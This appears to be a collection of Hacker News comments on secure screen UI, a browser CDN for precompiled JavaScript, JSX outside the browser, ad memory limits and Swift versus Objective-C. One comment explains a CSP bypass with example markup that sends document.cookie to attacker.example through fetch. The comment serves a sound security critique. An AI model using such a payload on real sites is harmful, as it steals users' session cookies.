When the iPhone X notch was first announced I thought it would be a fantastic security UI opportunity: What if the top of the screen was only writable by the system? It would normally be black or show the time, but whenever there is a password dialog, it turns green with a security lock. This is something I've wanted on all computers for a while: fundamentally, on any computer where you can get access to the whole screen's buffer, you can fake a logged-out screen asking the user to log in, or mount any number of other phishing attacks. The only way to prevent this is to have a separate secure screen buffer for a special part of the screen that the user can use to visually verify the security of an operation. The notch provided an awesome opportunity for this because: 1) it was NEW screen real estate, so it wouldn't feel like you were giving up existing screen space for this security need, and 2) it looks absolutely horrible when integrated into apps anyways, so why not use it minimally for good reason instead?
This already exists on Windows (via requiring Ctrl-Alt-Del) and to a lesser degree on Android (by always being able to show the action bar in fullscreen).
> This is something I've wanted on all computers for a while: fundamentally, any computer where you can get access to the whole screen's buffer means you can fake a logged out screen asking you to log in, or any other number of phishing attacks.
In Windows, I can render the whole screen, so I can put up a fake login dialog. To some extent, Windows users are used to requiring a Ctrl-Alt-Delete before being prompted for a password, but there's no reason why I can't put up a static image of what the screen looks like during a password request. Having a portion of the screen which an application is forbidden from accessing would solve this, but the requirement to support full-screen applications that want to write every user-visible pixel means that there's fundamentally no way to prevent this attack.
Ctrl-Alt-Delete on Windows is a privileged hotkey that goes directly to the kernel. A phishing program can't intercept it once it has been pressed. If you could know that Ctrl-Alt-Delete had been pressed, you would already be privileged as the kernel and would be able to compromise a hypothetical protected screen buffer anyways.
The Windows login screen here doesn't allow you to type in the password until you press the magical keys that only the kernel can access. This significantly increases security, since any phishing program that puts up a fake static image doesn't know when to present the login dialog.
Programs can detect Ctrl-Alt-Del somehow, because RDP clients do it. But they can't intercept it.
But a phishing program can just show the enter-password screen without the Ctrl-Alt-Del prompt. Few users understand the security need to press Ctrl-Alt-Del. And in newer Windows versions, it doesn't seem to prompt for it unless you enable it via Group Policy.
There are two vectors here; the one that the post was talking about is the fact that as long as an application controls the screen, it can show whatever it wants -- for example, an app (or a full-screen web site) could render a pixel-perfect copy of a UAC password prompt.
And the user would say "oh, another stupid UAC prompt", enter their password, and that would be that -- UAC doesn't stop and say "press ctrl-alt-delete to enter your password". If it did, then that would significantly decrease the risk here.
They can detect it; VMware, for example, detects it as well and tells you to use Ctrl+Alt+Insert instead.
Applications cannot fake Ctrl+Alt+Del.
That said, you can integrate with the Windows login and extend it to show whatever you want; I wrote a GINA client for a smart card a long, long time ago.
Not initially, but just as users can be 'trained' to automatically enter their password when they see a popup, they can eventually be trained to expect a new UI element that indicates it's secure.
Seems like in browsers, the lock icon and (for EV certs) the company name in the location bar have been a plus, so there's certainly precedent for this sort of thing.
Yes indeed. I'm always a little anxious when an installer (or something) prompts me for an administrator password, and some secure channel indicating that it's really the OS that's asking for it would help to assuage my fears.
What prevents a developer from counting on this new screen buffer being blank/black and making the top of the app's screen look exactly like that shape and style? The user won't see the difference except for a small top margin.
Am I missing something here? Isn't the notch already taken up by FaceID sensors/front-facing camera? It isn't really "extra screen real estate".
I do like the idea of a separate indicator for system-wide security events, though. Perhaps an LED indicator, although that doesn't seem very Apple-like.
I worked in dumb-phone standards 12 years ago (GlobalPlatform) and it was actually in the standards to tell the user "you are in the secure zone". Well, OEMs in the western world were not really willing to implement it; funny that it comes back now.
What are you embedding v8 into exactly? What happens if I figure out a buffer overflow in v8? What do I break out into? Is it solely process isolation? Is it in a container? A VM?
> What happens if I figure out a buffer overflow in v8?
You report it to Google for $15,000. ;)
More seriously, though, this is something we've spent a huge amount of effort worrying about. There are many layers of sandboxing and mitigation, including an incredibly tight seccomp filter, namespaces, cgroups, ASLR, architectural changes to keep sensitive secrets away from risky processes, etc. But we still worry and will continue to add more safeguards.
One of my main concerns with this proposal is the increasing complexity of what was once a very accessible web platform. You have this ever-increasing tooling knowledge you need to develop, and with something like this it would certainly increase, since "fast JS" would now require you to know what a compiler is. Sure, a good counterpoint is that it may be incremental knowledge you can pick up, but I still think a no-work, make-everything-faster solution would be better.
I believe there exists such a no-work alternative to the first-run problem, which I attempted to explain on Twitter, but it's not really the greatest platform for that, so I'll try again here. Basically, given a script tag:
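For illustration, something roughly like this (the attribute values are just placeholders):

    <script src="https://abc.com/script.js" integrity="sha256-123"></script>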
A browser, such as Chrome, would kick off two requests, one to abc.com/script.js, and another to cdn.chrome.com/sha256-123/abc.com/script.js. The second request is for a pre-compiled and cached version of the script (the binary AST). If it doesn't exist yet, the CDN itself will download it, compile it, and cache it. For everyone except the first person to ever load this script, the second request returns before the first one finishes downloading and parsing. Basically, the FIRST person to ever see this script online takes the hit for everyone, since that first request alerts the "compile server" of the script's existence; afterwards it's cached forever and fast for every other visitor on the web (that uses Chrome). (I later expanded on this to have interesting security additions as well -- there's a way this can be done such that the browser does the first compile and saves an encrypted version on the Chrome CDN, such that Google never sees the initial script and only people with access to the initial script can decrypt it.) To clarify, this solution addresses the exact same concerns as the binary AST proposal. The pros to this approach, in my opinion, are (I've sketched the flow in code after the pros and cons below):
1. No extra work on the side of the developer. All the benefits described in the above article are just free without any new tooling.
2. It might actually be FASTER than the above example, since cdn.chrome.com may be way faster than wherever the user is hosting their binary AST.
3. The cdn can initially use the same sort of binary AST as the "compile result", but this gives the browser flexibility to do a full compile to JIT code instead, allowing different browsers to test different levels of compiles to cache globally.
4. This would be an excellent way to generate lots of data before deciding to create another public facing technology people have to learn - real world results have proven to be hard to predict in JS performance.
5. Much less complex to do things like dynamically assembling scripts (like for dynamic loading of SPA pages) - since the user doesn't also have to put a binary ast compiler in their pipeline: you get binary-ification for free.
The main con is that it makes browser development even harder to break into, since if this is done right it would be a large competitive advantage and essentially requires a browser vendor to also host a CDN. I don't think this is that big a deal given how hard it already is to get a new browser out there, and the advantages from getting browsers to compete on compile targets make up for it in my opinion.
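To make the flow concrete, here's the sketch I mentioned: hand-wavy browser-side logic written as JS, though it would really live inside the browser. `executePrecompiled` and `evalPlainJs` are made-up placeholders, and a real implementation would presumably race the two requests rather than waiting on the cache first.

    // Hypothetical sketch of the dual-request scheme described above.
    async function loadScript(src, sha256) {
      const sourceRequest = fetch(src);                                       // the normal script request
      const cachedRequest = fetch(`https://cdn.chrome.com/${sha256}/${src}`); // the precompiled copy

      const cached = await cachedRequest.catch(() => null);
      if (cached && cached.ok) {
        // Every visitor after the very first one takes this fast path.
        return executePrecompiled(await cached.arrayBuffer());
      }

      // First visitor anywhere on the web: fall back to plain JS. The cache miss
      // is what tells the compile server to fetch, compile, and cache the script
      // for everyone who comes later.
      const source = await sourceRequest;
      return evalPlainJs(await source.text());
    }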
I don't think the binary AST proposal changes the accessibility status quo. In my mind, the best analogy is to gzip, Brotli, etc.
If you had to have a complicated toolchain to produce gzipped output to get the performance boost, that would create a performance gap between beginners and more experienced developers.
But today, almost every CDN worth its salt will automatically gzip your content because it's a stateless, static transformation that can be done on-demand and is easily cached. I don't see how going from JavaScript -> binary AST is any different.
I actually think gzip serves as a good example of this issue: this comment alone is daunting to a beginner programmer, and it really shouldn't be. This chrome/cdn thing could ALSO be auto-gzipping for you, so that a beginner throwing files on a random server wouldn't need to know whether it supports gzip or not. I think we really take for granted the amount of stuff completely unrelated to programming we've now had to learn. If our goal is to make the web fast by default, I think we should aim for solutions that work by default.
It's definitely the case that once a technology (such as gzip) gets popular enough it can reach "by default"-feeling status: express can auto-gzip, and you can imagine express auto-binary-ast-ing. It's slightly more complicated because you still need to rely on a convention for where the binary AST lives if you want to get around the dual-script-tag issue for older browsers that don't support binary AST yet (or, I suppose, have a header that specifies the browser supports binary AST results for JS files?). Similarly, at some point CDNs may also do this for you, but this assumes you know what a CDN is and can afford one. The goal I'm after is that it would be nice to have improvements that work by default on day 1, not after they've disseminated enough. Additionally, I think it's really dangerous to create performance-targeted standards this high in the stack (gzip pretty much makes everything faster; binary AST speeds up one kind of file and introduces a "third" script target for the browser). The chrome/cdn solution means that a firefox/cdn might try caching at a different level of compilation, meaning we get actual real-world comparisons for a year before settling on a standard (if necessary at all).
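For example, the express case might look something like this sketch (the `application/javascript-binary-ast` media type and the `.binjs` extension are made up for illustration; `compression` is the existing auto-gzip middleware, and path sanitization is ignored for brevity):

    const express = require("express");
    const compression = require("compression");
    const fs = require("fs");
    const path = require("path");

    const app = express();
    app.use(compression()); // today's "auto-gzip by default" case

    // Hypothetical content negotiation: if the browser advertises support for a
    // binary AST format and a precompiled artifact sits next to the .js file,
    // serve that instead.
    app.get(/\.js$/, (req, res, next) => {
      const precompiled = path.join(__dirname, "public", req.path + ".binjs");
      if (req.accepts("application/javascript-binary-ast") && fs.existsSync(precompiled)) {
        return res.type("application/javascript-binary-ast").sendFile(precompiled);
      }
      next(); // otherwise fall through to serving the plain .js below
    });

    app.use(express.static(path.join(__dirname, "public")));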
Edit: another thing to take into account is that it now becomes very difficult to add new syntax features to JavaScript if it's no longer just the browser that needs to support them, but also the version of the Binary AST compiler that your CDN is using.
The process of getting content on to the web has historically been pretty daunting, and is IMO much easier now than the bad old days when a .com domain cost $99/year and hosting files involved figuring out how to use an FTP client.
In comparison, services like Now from Zeit, Netlify, Surge, heck, even RunKit, make this stuff so much easier now. As long as the performance optimizations are something that can happen automatically with tools like these, and are reasonable to use yourself even if you want to configure your own server, I think that's a net win.
I do agree with you though that we ought to fight tooth and nail to keep the web as approachable a platform for new developers as it was when we were new to it.
On balance, I'm more comfortable with services abstracting this stuff, since new developers are likely to use those services anyway. That's particularly true if the alternative is giving Google even more centralized power, and worse, access to more information that proxying all of those AST files would allow them to snoop on.
This suggestion has a problem similar to the reason that browsers don't globally cache scripts based on integrity values. With your suggestion, suppose a domain temporarily hosts a .js file with a CSP-bypass vulnerability (e.g. `eval(document.querySelector('.inline-javascript').textContent)` is a simple example; many popular JavaScript frameworks do the equivalent of this), and then later removes it and starts using CSP. An attacker who knows an XSS vulnerability (which would otherwise be useless because of CSP) could inject a script tag with the integrity set equal to that of the CSP-vulnerable script that used to be hosted at the domain, and Chrome would find the script in the cdn.chrome.com cache.
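Concretely, the injected markup would look something like this (domain, filename, and hash are all made up):

    <!-- victim.example no longer hosts retired-helper.js and now sends a strict CSP,
         but the shared cache still has the old file under its hash, so the browser
         loads it from cdn.chrome.com anyway. -->
    <script src="https://victim.example/retired-helper.js"
            integrity="sha256-HashOfTheOldEvalFromDomScript"></script>

    <!-- The old helper evals the text of .inline-javascript elements, so this
         attacker-controlled element becomes executable code despite the CSP. -->
    <div class="inline-javascript">
      fetch('https://attacker.example/?c=' + document.cookie)
    </div>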
(You might be thinking someone could set CSP to disable eval on their pages, but eval is reasonably safe even in the presence of otherwise-CSP-protected XSS attacks as long as you aren't using code that goes out of its way to eval things from the DOM, and it's more than annoying that the only way to protect yourself from this cache issue would be to disable eval. ... Also, there are some libraries that interpret script commands from the DOM without using eval, so disabling eval doesn't even protect you if you previously hosted one of those javascript files.)
You could have the cdn.chrome.com cache aggressively drop entries older than a certain amount of time, like a day. But then there's the question of whether the requests to the cache are just wasted bandwidth for the many requests users make to scripts that haven't been loaded in a day. And the whole system means that website security can depend on cdn.chrome.com in some cases. I'd rather just build and host the processed binary AST myself. I already use a minifier; for most people, the binary AST tool would just replace their minifier.
Interesting idea, which could be built on top of the Binary AST.
I would personally prefer it being handled transparently by the middleware or the cdn, which would neatly separate the responsibilities between the browser, the cache+compressor and the http server.
Anyway, one of the reasons this project is only about a file format is so that we can have this kind of conversation about what browsers and other tools can do once we have a compressed JS format.
One of my fears about doing this at the CDN level is that introducing a new syntax feature now means you need the browser to support it AND the version of the Binary AST compiler on your CDN. Imagine using a new JS keyword and all of a sudden all your code gets slower because it's a syntax error at the CDN level. It would just slow the rate of introduction of new syntax features, I think, by needing a lot more coordination: it's already a bit messy with different browsers having different support, and now caniuse.com may need to include CDNs too.
One of the nice things about the way we do things with RunKit embeds (https://runkit.com/docs/embed) is that the code lives in your site, not on ours. The API generates the embed the same way something like highlight.js generates syntax-colored code on your site. That means if we're ever down, your site gracefully degrades to a not-runnable snippet, as opposed to merely disappearing like this seems to or with embedded gists.
I've written an in-depth blog post on "generic JSX", which turns JSX into function bind/currying syntax that would work fine in any framework (or no framework at all, as we currently use it).
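Roughly, the flavor of it (heavily simplified here):

    // Instead of compiling <Profile size="large">Hi</Profile> into
    // React.createElement(Profile, { size: "large" }, "Hi"), emit a plain
    // curried call, so a component is just a function of props, then children:
    const Profile = (props) => (...children) =>
      `<section class="${props.size}">${children.join("")}</section>`;

    const html = Profile({ size: "large" })("Hi"); // what the JSX would become
    console.log(html); // <section class="large">Hi</section>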
That would actually be super useful. After writing React applications for quite a while, JSX became the best part for me. Performance-wise, not using React is actually faster ^^ (if you take care of the dirty updating work yourself, of course).
Six years ago I wrote a proof of concept to replace a large Rails application with pure JS, using prototypes and constructing the HTML from strings. The latter turned out to be the messiest part, so I stopped and instead refactored the legacy Rails code to do something useful.
Could be really great for super lightweight JS apps!
It's also important to consider the environment, since JSX is potentially much bigger than the web.
JSX is much like other generic user interface markup languages[0] and, like many others, is simply a dialect of XML. Any interface that can be represented with XML/HTML or any other markup language can use JSX, and optionally React. We are already seeing this boom in native mobile environments with React Native, NativeScript, Titanium...
Here are several examples where JSX is used outside the browser:
- Native desktop apps for Linux, Mac, and Windows (Not including Electron/NW.js)[1][2][3][4]
- TVs with AppleTV apps or Netflix's Gibbon[5][6]
- Command line apps as stdin/stdout with react-blessed[7]/mylittledom[8]
- Direct to Canvas[9]/pixi.js[10]
- Latex documents[11]
- Web Audio[12]
- Console.logs[13]
- Truly custom direct to hardware[14] as some C code like: `digitalWrite(led, HIGH)`
I definitely believe JSX could use standardization separate from any implementation, JavaScript or otherwise.
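After all, JSX is just sugar for nested function calls, so any target only has to supply its own element factory. A tiny sketch (the `h` function and the `panel`/`label` element names are arbitrary):

    /** @jsx h */
    // With the pragma set, <panel>...</panel> compiles to h("panel", ...),
    // and h can build whatever a non-browser backend needs -- here, a plain object tree.
    const h = (type, props, ...children) => ({ type, props: props || {}, children });

    const tree = <panel color="blue"><label>Hello</label></panel>;
    // tree === { type: "panel", props: { color: "blue" },
    //            children: [{ type: "label", props: {}, children: ["Hello"] }] }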
I think a good approach would be to have web browsers limit the amount of memory ads can use on a given page.
This would hopefully align incentives: we understand that ads are necessary for the web, but ad makers have to work on efficiency to increase revenue. This would theoretically be like "AMP for ads". If your ad uses too much memory, it gets dropped because it keeps crashing on the page (just the ad, of course).
If you wanted to be perverse, you could have a limit on the TOTAL memory all ads could use on a page, so you end up creating group pressure on any individual that's not playing nice (they might start demanding not to be served on the same page as those ads, etc.). But maybe this is too much. Just limiting memory usage at all is a good start.
The important thing here is that it hopefully leads to the world we actually want: REASONABLE ads that don't require crazy measures that end up hurting the sites we love. Browsers COULD ship this by default without hurting the ecosystem.
Mozilla is looking to use Firefox's Tracking Protection list to lower the priority of ads' HTTP requests and more aggressively throttle them when they are not visible. But setting a fixed ad budget per page, as you suggest, or maybe forcing all ads from all tabs to share one process could be interesting.
> have web browsers limit the amount of memory ads can use on a given page
That's easily done by installing an adblocker! Can't beat memory limit = 0.
> we understand that ads are necessary for the web
Well, hold on now. The web existed before ads did, and it was pretty cool. If ads disappeared, we'd still have a web - lots of its most annoying parts would disappear, and we'd have a lot of readjusting to do, but what we'd end up with would keep all the best parts of what we have now, because the best parts of the web aren't based on ads.
First off, this is very well written. Secondly, I'd like to state that I think Objective-C and Cocoa were really good. I disagree with most of the design paradigms today, but I think the Objective-C/Cocoa ecosystem represented something approaching a local maximum in the mutable programming space. Maybe not even a maximum, as I was actually really happy with the direction it was going pre-Swift (KVO was starting to get good in NSTreeNode, the language additions were welcome, etc.).
All this to say: I think the Swift transition was really misguided, and I was incredibly surprised that that wasn't the general take at the time. Everything about it seemed not well planned out: the fact that no one at Apple had heard of it (you have the world's best ObjC programmers in-house and don't bother to get internal buy-in first!), the fact that it was really a response to C++, not Objective-C (this is so clear when listening to Lattner, who, incidentally, seems to have done most of his programming in C++), the fact that they sold it as good for everything from scripting to systems programming (huge red flag), and on and on.
But the real concern here was the opportunity cost. What was the problem they were trying to solve with Swift? That square brackets were off-putting? That a group that until that point was totally bought into dynamic dispatch should switch gears completely to a strictly typed language? If you ask me, the only goal that should have mattered was making development easier and expanding the scope of people who could approach the platform. And, for the record, I am sure they believe they attacked this problem; I clearly disagree, however.
I think the real areas ripe for improvement were the tools. Look no further than Facebook, with React Native and the no-recompile workflows where you change the UI and see it instantly on your device. That would have been a game changer in making development easier, not adding Maybes (and this is coming from someone who does immutable development now). Objective-C could have been evolved into the language they wanted. It would probably have taken just as long as however long this "transition" is going to take, and it would have given everyone immediate, actionable benefits instead of being a binary switch that comes along with the pain of having to ship the runtime.
Instead, we have discussions about whether Foundation is going to be rewritten in Swift. This seems like such an incredible misprioritization: essentially creating a situation for yourself where you have to burn everything down and start from scratch, all while in the meantime having the head-scratching platform where the base libraries are written in a dynamic language and user-land code is in a strict systems language.
The last thing I'll mention is the worrying lack of "purpose" for Swift. Talk to a Rust guy, and he WILL tell you the reason to use Rust. Talk to a Haskell person and they'll do the same. The sole reason for Swift seems to be "to take over the world". It is decidedly not a very opinionated language in that regard. In the ATP interview, Lattner even said that dynamic dispatch may be added later to Swift so no one should worry about it; it seems like such a kitchen sink. (I loved the bit where he said that if they add multiline string literals they can probably "win" the scripting space.) Not a lot of passion there.
> The last thing I'll mention is the worrying lack of "purpose" for Swift. Talk to a Haskell person and they'll do the same.
Really? Real type safety and no null pointer exceptions unless you really want it are not a purpose? A compact syntax that is still as descriptive as Objective-C's syntax?
My programs are much more stable in a lot of regards since I started using Swift.
I do not believe stability was the problem in iOS land (from my personal user perspective). The problems with iOS apps I experience most frequently come from a lack of handling asynchronous events and state management. I can frequently get programs into weird states due to clearly unhandled edge cases in the way animations finish, or things loading before something else is ready, etc. I think attacking asynchronous flow management (the way countless other languages like JavaScript, Python, and C# have with async/await, for example) would have really demonstrated an understanding of the key space this language was going to be initially used for. Instead, async primitives are going to be missing for at least another version of the language, and programmers will remain stuck using very primitive synchronous tools for managing the increasingly complex asynchronous states demanded by ever more animation-heavy and internet-talking apps. I believe investing in asynchronous language additions for Objective-C would have led to much more stability from a user perspective. And they aren't even mutually exclusive: Objective-C was already moving in the direction of more type safety and could have continued down that path.
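For instance, even something as simple as this async/await style (with made-up fetch helpers) makes ordering explicit in a way that ad-hoc callback and delegate spaghetti rarely does:

    // Hypothetical helpers; the point is that dependent asynchronous steps read
    // like straight-line code, so "B ran before A was ready" states are harder
    // to create by accident.
    async function showProfile(userId) {
      const user  = await fetchUser(userId);   // nothing below runs until this resolves
      const posts = await fetchPosts(user.id);
      render(user, posts);                     // only runs once both are available
    }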
Separately, I think people who have used languages like Elm or Haskell would argue that Swift does not present a particularly strong example of "real type safety" -- both from a language perspective (yes, certainly stricter than some languages, but not as strong as others) and from a culture perspective. Haskell/Elm people, I think, have a true culture of correctness in code (and arguably Rust as well, from the type-for-ownership-safety perspective), which Swift does not particularly share as far as I can tell. Don't get me wrong, it is in fact "stronger" than Objective-C, but I don't think it's the slam-dunk go-to language for mission-critical software, or a guarantee of safe software either, mind you. Again, I think an indicator of this is the fact that the creator is convinced it could rock both systems programming AND scripting. I think most other languages, if asked the big "why?", would tell you THE raison d'être. Aside from the default answer of "the standard language for iOS apps", I don't get a strong sense of that from Swift; if I did, I think there would be a lot of talk along the lines of "Swift is for X, we don't want to be distracted by Y right now" (I think many people want to write server code in Elm, but the Elm folks staunchly want to NAIL UI programming first; Rust wants to NAIL systems programming with safety; etc.). With Swift it's always "oh, once we add this feature, then it'll be perfect for that too".
> I do not believe stability was the problem in iOS land (from my personal user perspective)
This. (And the parent). Almost everything that's an improvement in Swift rated at best a "nice to have" in my experience with development pain points.
And what's really surprising is that, due to the flexibility of Objective-C, we actually had some fairly good ideas of where those pain points were: all the places runtime-dynamicism/metaprogramming was used to "extend" the language.
So address these points, and better yet, create better metasystems that allow users of the language to tackle these issues with less hackery.
Instead, pretty much crickets on all of these fronts, and at best grudging incorporation of minimal bridges to those same hacks. Wut?
Instead a "playground" for the compiler to show how incredibly smart it is.
I think compatibility with Objective-C and existing libraries is one of the main reasons why things like the fragile [weak self]/strong-self dance in callbacks still exist in Swift.
I once got back a different object than a Swift interface promised. That's definitely because some kind of Objective-C library returned something else entirely while still compiling fine.
I like Objective-C and would still use it when I need a lot of C or C++ libraries. But Swift's compile-time guarantees are simply better, forcing me to write safer code or removing a ton of boilerplate checks altogether.
Although responding to this one cherry-picked snarky statement I made is probably a mistake, as it's almost certainly clear from, for example, another difference I list in the immediately following sentence, I will bite and state that you probably underestimate the "Objective-C is weird" complex it suffered throughout its entire lifetime, and that that almost certainly contributed to considering writing/approving an entirely new language. Additionally, the reason to call out the square brackets is that many of the other Swift differences could have been integrated into an evolved Objective-C.
That sounds backwards to me. Syntax is fairly trivial, and adding a new syntax for message sends in Objective-C would have been easy. They already did this a bit by adding dot-syntax for accessing properties. Adding other major Swift features to ObjC, like pervasive type inference, generics, and capable value types would be much harder without effectively turning it into a new language.
(And yes, I know ObjC got generics recently, but it's not remotely the same as what Swift has.)
Logically, yes. Well, only sort of, but that's a different topic.
However, emotionally it seems to be of the utmost importance, and developers are just as human as the rest of the world; we just manage to rationalize our prejudices better than most.
I've talked to many, many developers as to why they like/enjoy/prefer Swift. A lot of the reasons that are given turn out to be, well, let's just say "less than substantive". And after a bit of digging it pretty much boils down to the "familiar" syntax.
That always baffled me. I feel like an experienced developer should be like Cypher in The Matrix. "I don't even see the code. All I see is blonde, brunette, redhead." But I do realize that it's how some people work, even if I don't get it.
In any case, I was talking about the difficulty of making changes to a compiler, not how programmers react to it.
> a mistake as it's almost certainly clear from, for example, another difference I list in the immediately following sentence...
I didn't reply to that sentence because I didn't want to have to point out that your understanding of Objective-C is incorrect: it is not weakly typed; only some Foundation objects are weakly typed.
As the other comment here mentions, syntax is trivial (although a syntax informed by 20 years of language design is not so trivial to me day to day); the key differences in overall safety, expressiveness, and features in the language are far bigger than trivial method syntax.
Uh oh, about to get into an argument over terms that have no precise definition, but I believe that in the context of Objective-C vs. Swift, it is perfectly fair to consider Objective-C weakly typed. In fact, I think that in the context of Objective-C vs. most other typed languages it is perfectly fair to consider Objective-C weakly typed, especially when the dominant culture involved using id everywhere, and since generics were only added very late in the language, your base collection classes were all weakly typed for 99% of its life. I'd find it really eyebrow-raising for someone not to consider Objective-C "more weakly typed" than Swift; or do you think that Swift did not introduce a culture of stronger typing?
But I digress: regardless of whether syntax is trivial or not, my point is that I believe wanting a clear syntactic break from a language that was dogged its entire life by the perception of being "different looking" was probably a goal in the creation of a new language. Do you really not remember pre-Swift, when "Objective-C is weird looking" was an actual argument people would make? Objective-C could have been made more safe; it could not, however, have its syntax drastically altered without considering it a new language.
Also, for the record, before Apple got serious about protocols, AppKit and WebKit were full of respondsToSelector: mumbo-jumbo, so you're just wrong about Objective-C not being weakly typed. If I can type it weakly, then it is weakly typed. And by "can" I mean "can effectively": thanks to Objective-C's reflection you can both use id and still interact with it, versus creating an AnyObject-typed value in a stricter, strongly typed language where the compiler will not let you just call whatever method you want on it. In fact, remnants of this clearly remain in WebKit, where you have protocols in which every method is optional, and thus everything is respondsToSelector:-protected, making a "strongly typed" description highly suspect.
> your understanding of Objective-C was incorrect, it is not weakly typed,
That's an, er, interesting statement.
Objective-C is probably about as weakly typed as it is possible to get and still have the ability to write type annotations. From a static typing perspective, it combines the strongly dynamically typed world of Smalltalk with the weakly statically typed world of C, and with the strong possibility of C-style consequences (kaboom) if you get it wrong.
First of all, the ability to statically type Objective-C objects was added to the language after-the-fact (NeXTStep 2.x or 3.x?), and those types have been and continue to be largely cosmetic (with one crucial exception). So if I have "NSNumber *a" and the actual object is an NSString, the runtime will select the NSString methods, not the NSNumber methods.
Subverting the "type checking" is about as easy as can be: (a) assign from/to "id" (b) pipe through a collection (now we have pseudo-generics) (c) cast (d) declare methods on a protocol that you never implement anywhere (or that has been implemented somewhere else).
The crucial exception is that if you have, roughly speaking, C types (particularly ones that aren't equivalent to an 'id' in machine representation) in your message signature, you will crash if your signatures are incompatible because you got the wrong one.
Which is why I advocate for the safe "id subset"[1].
I think that would be the eventual goal, Objective-C minus C. Objective-C in a lot of ways was a vehicle for AppKit/UIKit, and that experience does not necessitate the C compatibility in my opinion. Don't get me wrong, the C compatibility is nice and allows some cool features when you need them, but I think it was more useful back in the day when performance was more of a concern, and a good FFI layer would be sufficient now.
> I think that would be the eventual goal, Objective-C minus C.
I still think that if your goal was this gradually typed language on top of a dynamic runtime, it would make more sense to start anew and model your language after, say, StrongTalk or (the good parts of) JavaScript/TypeScript, rather than trying to evolve the existing Objective-C language and Clang implementation.
I guess I mostly take issue with your characterization of Swift as C++ derived, or consisting of a collection of random features. The designers avoided a lot of the brokenness of C++, such as header files, copy constructors, compile-time instantiation of (what are essentially untyped) templates, etc, and when compared with Objective-C together with the C parts, the language seems mostly well-thought out and orthogonal, even if my personal preference would have been to start with less syntax sugar.
I think a better assessment is that Swift is sort of an OCaml with more C-like syntax, together with some design decisions meant to ease interoperability with Objective-C, such as the choice to go with ARC over GC.
So this brings me to what I really wanted to say, which is that I feel like a gross simplification of your overall argument is "I wanted Strongtalk, and they gave us OCaml". I understand and respect that point of view, and don't really have a concise rebuttal to offer; it mostly comes down to personal preference. Perhaps if things had turned out the other way, we would instead be hearing a lot of feedback along the lines of, "Why is Apple ignoring the last 20 years of type system research", etc.
Another thing that's mostly lost in these discussions is that people lump a ton of mostly independent features under the banner of "dynamic dispatch". In a formal sense Swift has dynamic dispatch, in that you can write a function that calls methods on a protocol, passing in different concrete types at runtime. That certainly qualifies in my opinion. I think what is really meant here is the following three capabilities:
1) Write reflection. Right now, Swift actually emits more metadata than Objective-C, in the sense that all values can be reflectively inspected, whereas the Objective-C runtime only knows about classes, and not anything else. For example you can print() any value in Swift and get a sort-of homoiconic representation back, showing the enum case and associated value, or the fields of a struct or tuple, etc. This is implemented with a 'Mirror' type in the standard library which reads this metadata produced by the compiler and presents it as a keyed collection that can be subscripted, iterated over, etc. What's missing here is presenting it as a mutable dictionary, and this can be added without introducing much complexity in the language.
2) Forming dynamic calls and introspecting the methods of a class, or the functions in a module. This is a bit more difficult to design and implement, but I think it can be introduced in a clean way that's sane to use. It's really quite a shame that Java has set the bar so low for such capabilities in a statically-typed language; while all the actual features are there (and you can even synthesize bytecode at runtime), it's incredibly awkward to use, which means developers constantly re-invent frameworks on top of these mechanisms over and over again, but they seem to only obscure the basic ideas further with a soup of FactoryFactories and XML files.
3) Proxy objects dynamically conforming to protocols. Again, this can be statically-typed; starting with a set of closures that implement the requirements of a protocol, the runtime could cook up the right structures to make it appear like an "ad-hoc" instance of the protocol that's not backed by a named concrete type. With the right API this could be quite pleasant and concise.
I believe all of these could be added in a clean way that's easy to use, mostly as library features without introducing new syntax or semantics. Their current absence should not be seen as an inherent limitation.
Finally, I agree with your point that interactive development is important and should be more of a focus in general. I think it's a shame that since the early 90s or so, programming language research has centered on designing (mostly statically-typed) languages with batch compilers, and not complete "environments" like Smalltalk-80, Self, Lisp machines, etc. It would be good to see more projects explore the latter, and the basic ideas should apply to both static and dynamically typed languages.
I like what you're doing with RunKit, by the way -- best of luck there.
Pithy, and there's some truth to that, but I would point out that (a) StrongTalk is now well over 20 years old (b) it has a sophisticated type-system that could certainly have been developed further and (c) it requires a JIT for performance.
But "Objective-C without the C" does point very strongly in the direction of Smalltalk, and a Smalltalk language that can be AOT compiled roughly as efficiently as Objective-C and is at least as compatible with C/Objective-C seems like not too much of a challenge.
After all, Objective-C now has tagged pointer objects, so a lot of the need for primitives has gone away. So let all literals/variables be objects by default and the syntactic overhead due to duplication goes away ( 1, @1, "string", @"nsstring" ).
What if we want "C" level primitives? Just type them:
Pointers are trickier and should, IMHO, be generalized to 1st-class references that subsume things like KVC/KVO/bindings, file references, URIs, etc. (see http://objective.st/URIs ).
So the point is not 'Objective-C forever', but rather: let's actually learn from what was good and bad about Objective-C and base our language design on that, rather than coming completely from left field and then only putting in compatibility kludges.
Then you wouldn't have the situation we have now, where people are clamoring for "pure Swift" versions of... well, pretty much everything, and those things, if "pure Swift", are going to be incompatible with what is there now. And more importantly, they won't build on the knowledge/learnings of what is arguably the best UI framework ever built.
Yeah. Nothing has really come close to offering the same experience as HyperCard in my opinion. The key feature that no subsequent environment has really been able to copy is that there's no distinction between "running" and "editing" your program; while the UI is modal, this is mostly a convenience to avoid clutter, and fundamentally, your stack is always "running", whether you're authoring, editing data or just browsing.
I've responded to this further down: https://news.ycombinator.com/item?id=13545862 , but this is not how this feature works. The confusion is completely understandable if you've never used RunKit, but the idea is not to give people containers, but rather a "common ground" where users can provide reproducible test cases.